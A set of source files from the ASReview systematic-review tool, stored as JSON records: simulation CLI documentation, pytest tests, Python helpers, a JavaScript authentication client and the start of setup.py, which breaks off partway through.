:ref:`benchmark-datasets <data_labeled:fully\nlabeled data>` (see `index.csv\n<https://github.com/asreview/systematic-review-datasets/blob/master/index.csv>`_\nfor dataset IDs). Use the following command and replace ``DATASET_ID`` by the\ndataset ID.\n\n.. code:: bash\n\n asreview simulate benchmark:DATASET_ID\n\nFor example:\n\n.. code:: bash\n\n asreview simulate benchmark:van_de_Schoot_2017 -s myreview.asreview\n\n\nActive learning\n~~~~~~~~~~~~~~~\n\n.. option:: -e, --feature_extraction FEATURE_EXTRACTION\n\n The default is TF-IDF (:code:`tfidf`). More options and details are listed\n in :ref:`ref-feature-extraction`.\n\n.. option:: -m, --model MODEL\n\n The default is Naive Bayes (:code:`nb`). More options and details are listed\n in :ref:`ref-classifiers`.\n\n.. option:: -q, --query_strategy QUERY_STRATEGY\n\n The default is Maximum (:code:`max`). More options and details are listed\n in :ref:`ref-query-strategies`.\n\n.. option:: -b, --balance_strategy BALANCE_STRATEGY\n\n The default is :code:`double`. The balancing strategy is used to deal with\n the sparsity of relevant records. More options and details are listed\n in :ref:`ref-balance-strategies`\n\n.. option:: --seed SEED\n\n To make your simulations reproducible you can use the ``--seed`` and\n ``--init_seed`` options. 'init_seed' controls the starting set of papers\n to train the model on, while the 'seed' controls the seed of the random\n number generation that is used after initialization.\n\n.. option:: --embedding EMBEDDING_FP\n\n File path of embedding matrix. Required for LSTM models.\n\n\nPrior knowledge\n~~~~~~~~~~~~~~~\n\nBy default, the model initializes with one relevant and one irrelevant record.\nYou can set the number of priors by ``--n_prior_included`` and\n``--n_prior_excluded``. However, if you want to initialize your model with a\nspecific set of starting papers, you can use ``--prior_idx`` to select the\nindices of the papers you want to start the simulation with.\n\n.. option:: --n_prior_included N_PRIOR_INCLUDED\n\n The number of prior included papers. Only used when :code:`prior_idx` is\n not given. Default 1.\n\n.. option:: --n_prior_excluded N_PRIOR_EXCLUDED\n\n The number of prior excluded papers. Only used when :code:`prior_idx` is\n not given. Default 1.\n\n\n.. option:: --prior_idx [PRIOR_IDX [PRIOR_IDX ...]]\n\n Prior indices by rownumber (rownumbers start at 0).\n\n\n.. option:: --init_seed INIT_SEED\n\n Seed for setting the prior indices if the prior_idx option is not used. If\n the option prior_idx is used with one or more index, this option is\n ignored.\n\n\n\nSimulation setup\n~~~~~~~~~~~~~~~~\n\n.. option:: --n_instances N_INSTANCES\n\n Controls the number of records to be labeled before the model is\n retrained. Increase ``n_instances``, for example, to reduce the time it\n takes to simulate. Default 1.\n\n.. option:: --stop_if STOP_IF\n\n The number of label actions to simulate. Default, 'min' will stop\n simulating when all relevant records are found. Use -1 to simulate all\n labels actions.\n\n\nSave\n~~~~\n\n\n.. option:: --state_file STATE_FILE, -s STATE_FILE\n\n Location to ASReview project file of simulation.\n\n\nAlgorithms\n----------\n\nThe command line interface provides an easy way to get an overview of all\navailable active learning model elements (classifiers, query strategies,\nbalance strategies, and feature extraction algorithms) and their names for\ncommand line usage in ASReview LAB. It also includes models added\nvia :doc:`extensions_overview`. The following command lists\nthe available models:\n\n.. code:: bash\n\n asreview algorithms\n\nSee :ref:`develop-extensions` for more information on developing new models\nand install them via extensions.\n\nSome models require additional dependencies to be installed. Use\n:code:`pip install asreview[all]` to install all additional dependencies\nat once or check the installation instruction in section :ref:`ref-models`\nof the :doc:`reference`.\n" }, { "alpha_fraction": 0.6696551442146301, "alphanum_fraction": 0.677931010723114, "avg_line_length": 30.521739959716797, "blob_id": "bfaae6f085bf23fcfe5d3f4f281d404a285c8338", "content_id": "d1af1717149ca90cdaebb55f13fd2edfbe942746", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1450, "license_type": "permissive", "max_line_length": 88, "num_lines": 46, "path": "/asreview/_deprecated.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2023 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport functools\nimport logging\nimport warnings\n\n\ndef _deprecated_func(msg):\n def dec(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n warnings.warn(msg)\n return func(*args, **kwargs)\n\n return wrapper\n\n return dec\n\n\nclass DeprecateAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n logging.warning(f\"Argument {self.option_strings} is deprecated and is ignored.\")\n delattr(namespace, self.dest)\n\n\ndef mark_deprecated_help_strings(parser, prefix=\"DEPRECATED\"):\n for action in parser._actions:\n if isinstance(action, DeprecateAction):\n h = action.help\n if h is None:\n action.help = prefix\n else:\n action.help = prefix + \": \" + h\n" }, { "alpha_fraction": 0.714029848575592, "alphanum_fraction": 0.7301492691040039, "avg_line_length": 31.843137741088867, "blob_id": "dbe409ed7d98b8adf30cfef5eb217904f8c76ce1", "content_id": "89ed8c8b4685b8e71ad03ecb29b048491215dc57", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1675, "license_type": "permissive", "max_line_length": 106, "num_lines": 51, "path": "/docs/source/manage.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Manage projects\n===============\n\nASReview LAB offers the options to import and export projects. This can be\nuseful for sharing results, archiving projects, and for backup purposes.\n\n\n.. figure:: ../images/dashboard_project_options.png\n :alt: ASReview LAB Projects dashboard show options\n\nImport Project\n--------------\n\nTo import a project:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* (http://localhost:5000/projects)\n3. Click on the *Import project* icon on the top right.\n4. Click on *Select file* and select a project from your device (with ``.asreview`` extension.\n5. Open the project from the *Projects dashboard*.\n\nExport Project\n--------------\n\nThe ASReview project file (extension ``.asreview``) can be exported from\nASReview LAB. The file contains the dataset, review history, notes, and model\nconfiguration. It can be imported into ASReview LAB on a different device,\nwhich allows other users to replicate the project, or continue the systematic\nreview.\n\nTo export your project:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* (http://localhost:5000/projects)\n3. Hover the project you want to export and click on the *Export* icon.\n4. Click on *Select file* and click on *Project*.\n5. Click on *Export*\n\nYou will be asked where to save the ASReview file (extension `.asreview`).\n\n\nDelete Project\n--------------\n\nTo permanently delete a project, including ALL files:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* (http://localhost:5000/projects)\n3. Hover the project you want to export and click on *Options*.\n4. Click on *Delete forever*.\n5. This action cannot be made undone, ASReview LAB will ask you to confirm by typing in the project title.\n" }, { "alpha_fraction": 0.6532823443412781, "alphanum_fraction": 0.6583811640739441, "avg_line_length": 24.721311569213867, "blob_id": "e6a91ba5f0451142addfdb3ec5c80625ba5c4bd6", "content_id": "785efcaf71093b390f9b3a423a2dcb453bf93ab0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1569, "license_type": "permissive", "max_line_length": 85, "num_lines": 61, "path": "/tests/test_feature.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import os\n\nimport pytest\n\nfrom asreview import ASReviewData\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.feature_extraction import list_feature_extraction\n\nADVANCED_DEPS = {\"tensorflow\": False}\n\nREQUIRES_EXTRA_DEPS = [\"doc2vec\", \"embedding-idf\", \"sbert\"]\n\ntry:\n import tensorflow # noqa\n\n ADVANCED_DEPS[\"tensorflow\"] = True\nexcept ImportError:\n pass\n\n\[email protected](\n \"feature_extraction\",\n [\n \"doc2vec\",\n \"embedding-idf\",\n # \"sbert\",\n \"tfidf\",\n ],\n)\[email protected](\n \"split_ta\",\n [\n 0,\n 1,\n ],\n)\ndef test_features(feature_extraction, split_ta):\n if feature_extraction in REQUIRES_EXTRA_DEPS and not ADVANCED_DEPS[\"tensorflow\"]:\n pytest.skip()\n\n embedding_fp = os.path.join(\"tests\", \"demo_data\", \"generic.vec\")\n data_fp = os.path.join(\"tests\", \"demo_data\", \"generic.csv\")\n\n as_data = ASReviewData.from_file(data_fp)\n texts = as_data.texts\n if feature_extraction.startswith(\"embedding-\"):\n model = get_feature_model(\n feature_extraction, split_ta=split_ta, embedding_fp=embedding_fp\n )\n else:\n model = get_feature_model(feature_extraction, split_ta=split_ta)\n X = model.fit_transform(texts, titles=as_data.title, abstracts=as_data.abstract)\n\n assert X.shape[0] == len(as_data.title)\n assert X.shape[1] > 0\n assert isinstance(model.param, dict)\n assert model.name == feature_extraction\n\n\ndef test_feature_general():\n assert len(list_feature_extraction()) >= 5\n" }, { "alpha_fraction": 0.6118633151054382, "alphanum_fraction": 0.6317583322525024, "avg_line_length": 30.46956443786621, "blob_id": "af803c30b4cffc97a34a36b2f51a975cc3b0328a", "content_id": "4af3332c66f557f90a0cfdce2f23c802a3352142", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10857, "license_type": "permissive", "max_line_length": 117, "num_lines": 345, "path": "/tests/test_simulate.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import json\nfrom pathlib import Path\n\nimport pytest\n\nfrom asreview.entry_points.simulate import SimulateEntryPoint\nfrom asreview.entry_points.simulate import _get_dataset_path_from_args\nfrom asreview.entry_points.simulate import _simulate_parser\nfrom asreview.project import ASReviewProject\nfrom asreview.project import ProjectExistsError\nfrom asreview.project import open_state\n\nADVANCED_DEPS = {\"tensorflow\": False}\n\ntry:\n import tensorflow # noqa\n\n ADVANCED_DEPS[\"tensorflow\"] = True\nexcept ImportError:\n pass\n\n\nDATA_FP = Path(\"tests\", \"demo_data\", \"generic_labels.csv\")\nDATA_FP_URL = \"https://raw.githubusercontent.com/asreview/asreview/master/tests/demo_data/generic_labels.csv\" # noqa\nDATA_FP_NO_ABS = Path(\"tests\", \"demo_data\", \"generic_labels_no_abs.csv\")\nDATA_FP_NO_TITLE = Path(\"tests\", \"demo_data\", \"generic_labels_no_title.csv\")\nEMBEDDING_FP = Path(\"tests\", \"demo_data\", \"generic.vec\")\nCFG_DIR = Path(\"tests\", \"cfg_files\")\nSTATE_DIR = Path(\"tests\", \"state_files\")\nH5_STATE_FILE = Path(STATE_DIR, \"test.h5\")\nJSON_STATE_FILE = Path(STATE_DIR, \"test.json\")\n\n\[email protected](\n raises=FileNotFoundError,\n reason=\"File, URL, or dataset does not exist: \" \"'this_doesnt_exist.csv'\",\n)\ndef test_dataset_not_found(tmpdir):\n entry_point = SimulateEntryPoint()\n asreview_fp = Path(tmpdir, \"project.asreview\")\n argv = f\"does_not.exist -s {asreview_fp}\".split()\n entry_point.execute(argv)\n\n\ndef test_simulate_review_finished(tmpdir):\n # file path\n asreview_fp = Path(tmpdir, \"test.asreview\")\n\n # simulate entry point\n entry_point = SimulateEntryPoint()\n entry_point.execute(f\"{DATA_FP} -s {asreview_fp}\".split())\n\n Path(tmpdir, \"test\").mkdir(parents=True)\n project = ASReviewProject.load(asreview_fp, Path(tmpdir, \"test\"))\n\n assert project.config[\"reviews\"][0][\"status\"] == \"finished\"\n\n\ndef test_prior_idx(tmpdir):\n asreview_fp = Path(tmpdir, \"test.asreview\")\n argv = f\"{str(DATA_FP)} -s {asreview_fp} --prior_idx 1 4\".split()\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as state:\n labeling_order = state.get_order_of_labeling()\n query_strategies = state.get_query_strategies()\n\n assert labeling_order[0] == 1\n assert labeling_order[1] == 4\n assert all(query_strategies[:1] == \"prior\")\n assert all(query_strategies[2:] != \"prior\")\n\n\ndef test_n_prior_included(tmpdir):\n asreview_fp = Path(tmpdir, \"test.asreview\")\n argv = f\"{str(DATA_FP)} -s {asreview_fp} --n_prior_included 2\".split()\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as state:\n result = state.get_dataset([\"label\", \"query_strategy\"])\n\n prior_included = result[\"label\"] & (result[\"query_strategy\"] == \"prior\")\n assert sum(prior_included) == 2\n\n Path(tmpdir, \"test\").mkdir(parents=True)\n project = ASReviewProject.load(asreview_fp, Path(tmpdir, \"test\"))\n\n settings_path = Path(\n project.project_path,\n \"reviews\",\n project.config[\"reviews\"][0][\"id\"],\n \"settings_metadata.json\",\n )\n with open(settings_path, \"r\") as f:\n settings_metadata = json.load(f)\n\n assert settings_metadata[\"settings\"][\"n_prior_included\"] == 2\n\n\ndef test_n_prior_excluded(tmpdir):\n asreview_fp = Path(tmpdir, \"test.asreview\")\n argv = f\"{str(DATA_FP)} -s {asreview_fp} --n_prior_excluded 2\".split()\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as state:\n result = state.get_dataset([\"label\", \"query_strategy\"])\n\n prior_excluded = ~result[\"label\"] & (result[\"query_strategy\"] == \"prior\")\n assert sum(prior_excluded) == 2\n\n Path(tmpdir, \"test\").mkdir(parents=True)\n project = ASReviewProject.load(asreview_fp, Path(tmpdir, \"test\"))\n\n settings_path = Path(\n project.project_path,\n \"reviews\",\n project.config[\"reviews\"][0][\"id\"],\n \"settings_metadata.json\",\n )\n with open(settings_path, \"r\") as f:\n settings_metadata = json.load(f)\n\n assert settings_metadata[\"settings\"][\"n_prior_excluded\"] == 2\n\n\n# TODO: Add random seed to settings.\n# def test_seed(tmpdir):\n# asreview_fp = Path(tmpdir, 'test.asreview')\n# argv = f'{str(DATA_FP)} -s {asreview_fp} --seed 42'.split()\n# entry_point = SimulateEntryPoint()\n# entry_point.execute(argv)\n#\n# with open(get_settings_metadata_path(asreview_fp), 'r') as f:\n# settings_metadata = json.load(f)\n#\n# assert settings_metadata['random_seed'] == 42\n\n\ndef test_non_tf_models(tmpdir):\n models = [\"logistic\", \"nb\", \"rf\", \"svm\"]\n for model in models:\n print(model)\n asreview_fp = Path(tmpdir, f\"test_{model}.asreview\")\n argv = f\"{str(DATA_FP)} -s {asreview_fp} -m {model}\".split()\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as state:\n classifiers = state.get_classifiers()\n default_n_priors = 2\n assert all(classifiers[default_n_priors:] == model)\n\n Path(tmpdir, f\"test_{model}\").mkdir(parents=True)\n project = ASReviewProject.load(asreview_fp, Path(tmpdir, f\"test_{model}\"))\n\n settings_path = Path(\n project.project_path,\n \"reviews\",\n project.config[\"reviews\"][0][\"id\"],\n \"settings_metadata.json\",\n )\n with open(settings_path, \"r\") as f:\n settings_metadata = json.load(f)\n\n assert settings_metadata[\"settings\"][\"model\"] == model\n\n\ndef test_number_records_found(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n stop_if = 100\n priors = [116, 285]\n seed = 101\n\n argv = (\n f\"{dataset} -s {asreview_fp} --stop_if {stop_if} \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as s:\n assert s.get_labels().sum() == 29\n\n\ndef test_stop_if_min(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n stop_if = \"min\"\n priors = [116, 285]\n seed = 101\n\n argv = (\n f\"{dataset} -s {asreview_fp} --stop_if {stop_if} \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as s:\n assert s.get_labels().sum() == 38\n assert len(s.get_labels()) == 630\n\n\ndef test_stop_if_all(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n stop_if = -1\n priors = [116, 285]\n seed = 101\n\n argv = (\n f\"{dataset} -s {asreview_fp} --stop_if {stop_if} \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as s:\n assert s.get_labels().sum() == 38\n assert len(s.get_labels()) == 4544\n\n\ndef test_write_interval(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n stop_if = 100\n priors = [116, 285]\n seed = 101\n write_interval = 20\n\n argv = (\n f\"{dataset} -s {asreview_fp} --stop_if {stop_if} \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed} \"\n f\"--write_interval {write_interval}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as s:\n assert s.get_labels().sum() == 29\n\n\[email protected](raises=ProjectExistsError, reason=\"Cannot continue simulation.\")\ndef test_project_already_exists_error(tmpdir):\n asreview_fp1 = Path(tmpdir, \"test1.asreview\")\n\n argv = (\n f\"synergy:van_de_Schoot_2018 -s {asreview_fp1} --stop_if 100\"\n f\" --seed 535\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n # Simulate 100 queries in two steps of 50.\n argv = (\n f\"synergy:van_de_Schoot_2018 -s {asreview_fp1} --stop_if 50\"\n f\" --seed 535\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n\[email protected](reason=\"Partial simulations are not available.\")\ndef test_partial_simulation(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp1 = Path(tmpdir, \"test1.asreview\")\n asreview_fp2 = Path(tmpdir, \"test2.asreview\")\n\n priors = [284, 285]\n seed = 101\n\n # Simulate 100 queries in one go.\n argv = (\n f\"{dataset} -s {asreview_fp1} --stop_if 100 \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n # Simulate 100 queries in two steps of 50.\n argv = (\n f\"{dataset} -s {asreview_fp2} --stop_if 50 \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n argv = (\n f\"{dataset} -s {asreview_fp2} --stop_if 100 \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp1) as state:\n dataset1 = state.get_dataset()\n\n with open_state(asreview_fp2) as state:\n dataset2 = state.get_dataset()\n\n assert dataset1.shape == dataset2.shape\n # All query strategies should match.\n assert dataset1[\"query_strategy\"].to_list() == dataset2[\"query_strategy\"].to_list()\n # The first 50 record ids and labels should match.\n assert (\n dataset1[\"record_id\"].iloc[:50].to_list()\n == dataset2[\"record_id\"].iloc[:50].to_list()\n )\n assert (\n dataset1[\"label\"].iloc[:50].to_list() == dataset2[\"label\"].iloc[:50].to_list()\n )\n\n # You expect many of the same records in the second 50 records.\n # With this initial seed there are 89 in the total.\n assert (\n len(dataset1[\"record_id\"][dataset1[\"record_id\"].isin(dataset2[\"record_id\"])])\n == 89\n )\n\n\[email protected](reason=\"Partial simulations are not available.\")\ndef test_is_partial_simulation(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n\n argv = f\"{dataset} -s {asreview_fp} --stop_if 50\".split()\n parser = _simulate_parser()\n args = parser.parse_args(argv)\n\n assert not _is_partial_simulation(args) # noqa\n\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n assert _is_partial_simulation(args) # noqa\n\n\ndef test_get_dataset_path_from_args():\n assert _get_dataset_path_from_args(\"test\") == \"test.csv\"\n assert _get_dataset_path_from_args(\"test.ris\") == \"test.csv\"\n assert _get_dataset_path_from_args(\"benchmark:test\") == \"test.csv\"\n" }, { "alpha_fraction": 0.6859169006347656, "alphanum_fraction": 0.698074996471405, "avg_line_length": 34.25, "blob_id": "6e9b9f3033135833c427d352bdaac8feffc37608", "content_id": "f585c270d8808f4b0048c282c5b46c16c5f2c151", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 987, "license_type": "permissive", "max_line_length": 79, "num_lines": 28, "path": "/asreview/compat.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\ndef convert_id_to_idx(data_obj, record_id):\n \"\"\"Convert record_id to row number.\"\"\"\n\n inv_record_id = dict(zip(data_obj.df.index.tolist(), range(len(data_obj))))\n\n result = []\n for i in record_id:\n try:\n result.append(inv_record_id[i])\n except KeyError:\n raise KeyError(f\"record_id {i} not found in data.\")\n\n return result\n" }, { "alpha_fraction": 0.5211904048919678, "alphanum_fraction": 0.5219438672065735, "avg_line_length": 24.161136627197266, "blob_id": "849916485af78a4f6baa504dd3fbf957a99621c1", "content_id": "10ae8c28cc820e3455f38ae950082df816c83385", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5309, "license_type": "permissive", "max_line_length": 74, "num_lines": 211, "path": "/asreview/webapp/src/api/AuthAPI.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { axiosErrorHandler } from \"./axiosErrorHandler\";\nimport { auth_url } from \"../globals.js\";\nimport axios from \"axios\";\n\nclass AuthAPI {\n static signup(variables) {\n let body = new FormData();\n body.set(\"password\", variables.password);\n body.set(\"name\", variables.name);\n body.set(\"affiliation\", variables.affiliation);\n body.set(\"email\", variables.email);\n body.set(\"public\", variables.publicAccount === true ? 1 : 0);\n\n const url = auth_url + `signup`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static signin(variables) {\n let body = new FormData();\n body.set(\"email\", variables.email);\n body.set(\"password\", variables.password);\n\n const url = auth_url + `signin`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n // This is essential, allows cookies to be created through Headers\n withCredentials: true,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static forgotPassword(variables) {\n let body = new FormData();\n body.set(\"email\", variables.email);\n\n const url = auth_url + `forgot_password`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static confirmAccount(variables) {\n let body = new FormData();\n body.set(\"user_id\", variables.userId);\n body.set(\"token\", variables.token);\n\n const url = auth_url + `confirm_account`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static refresh() {\n const url = auth_url + `refresh`;\n return new Promise((resolve, reject) => {\n axios\n .get(url, { withCredentials: true })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static signout(variables) {\n const url = auth_url + `signout`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"delete\",\n url: url,\n withCredentials: true,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static getProfile() {\n const url = auth_url + `get_profile`;\n return new Promise((resolve, reject) => {\n axios\n .get(url, { withCredentials: true })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static updateProfile(variables) {\n let body = new FormData();\n body.set(\"password\", variables.password);\n body.set(\"name\", variables.name);\n body.set(\"affiliation\", variables.affiliation);\n body.set(\"email\", variables.email);\n body.set(\"public\", variables.publicAccount === true ? 1 : 0);\n\n const url = auth_url + `update_profile`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n withCredentials: true,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static resetPassword(variables) {\n let body = new FormData();\n body.set(\"password\", variables.password);\n body.set(\"token\", variables.token);\n body.set(\"user_id\", variables.userId);\n\n const url = auth_url + `reset_password`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n })\n .then((result) => {\n console.log(result);\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static oAuthCallback(data) {\n let body = new FormData();\n body.set(\"code\", data.code);\n body.set(\"provider\", data.provider);\n body.set(\"redirect_uri\", data.redirect_uri);\n const url = auth_url + `oauth_callback`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n // This is essential, allows cookies to be created through Headers\n withCredentials: true,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n}\n\nexport default AuthAPI;\n" }, { "alpha_fraction": 0.7880485653877258, "alphanum_fraction": 0.7992530465126038, "avg_line_length": 41.84000015258789, "blob_id": "ec4511c3520575a8dbc322cd1a561ea13c4b211a", "content_id": "ee6089ed48b4d101a2afe867ab95a59da222d42b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1071, "license_type": "permissive", "max_line_length": 74, "num_lines": 25, "path": "/asreview/io/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom asreview.io.csv_reader import CSVReader\nfrom asreview.io.csv_writer import CSVWriter\nfrom asreview.io.excel_reader import ExcelReader\nfrom asreview.io.excel_writer import ExcelWriter\nfrom asreview.io.paper_record import PaperRecord\nfrom asreview.io.ris_reader import RISReader\nfrom asreview.io.ris_writer import RISWriter\nfrom asreview.io.tsv_writer import TSVWriter\nfrom asreview.io.utils import list_readers\nfrom asreview.io.utils import list_writers\n" }, { "alpha_fraction": 0.6128746867179871, "alphanum_fraction": 0.6203364133834839, "avg_line_length": 33.37826156616211, "blob_id": "49e6b8dbfa8427b4567b4c4e75484ba4d17cceb2", "content_id": "a9e34ab31942e355923a411fd0cedb04e629704f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7907, "license_type": "permissive", "max_line_length": 87, "num_lines": 230, "path": "/setup.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# based on https://github.com/pypa/sampleproject - MIT License\n\n# Always prefer setuptools over distutils\nimport platform\nimport re\nimport subprocess\nimport sys\nfrom io import open\nfrom os import path\nfrom pathlib import Path\n\nfrom setuptools import Command\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nimport versioneer\n\n\ndef get_long_description():\n \"\"\"Get project description based on README.\"\"\"\n here = path.abspath(path.dirname(__file__))\n\n # Get the long description from the README file\n with open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\n # remove emoji\n long_description = re.sub(r\"\\:[a-z_]+\\:\", \"\", long_description)\n\n return long_description\n\n\nREQUIRES = [\n \"numpy\",\n \"pandas>=1,<3\",\n \"scikit-learn\",\n \"rispy~=0.7.0\",\n \"xlrd>=1.0.0\",\n \"setuptools\",\n \"flask>=2.3.0\",\n \"flask_cors\",\n \"flask-login\",\n \"flask-mail\",\n \"openpyxl\",\n \"jsonschema\",\n \"filelock\",\n \"Flask-SQLAlchemy>=3.0.2\",\n \"requests\",\n \"tqdm\",\n \"gevent>=20\",\n \"datahugger>=0.2\",\n \"synergy_dataset\"\n]\n\nif sys.version_info < (3, 11):\n REQUIRES += [\"tomli\"]\n\n\nif sys.version_info < (3, 10):\n REQUIRES += [\"importlib_metadata>=3.6\"]\n\n\nDEPS = {\n \"sbert\": [\"sentence_transformers\"],\n \"doc2vec\": 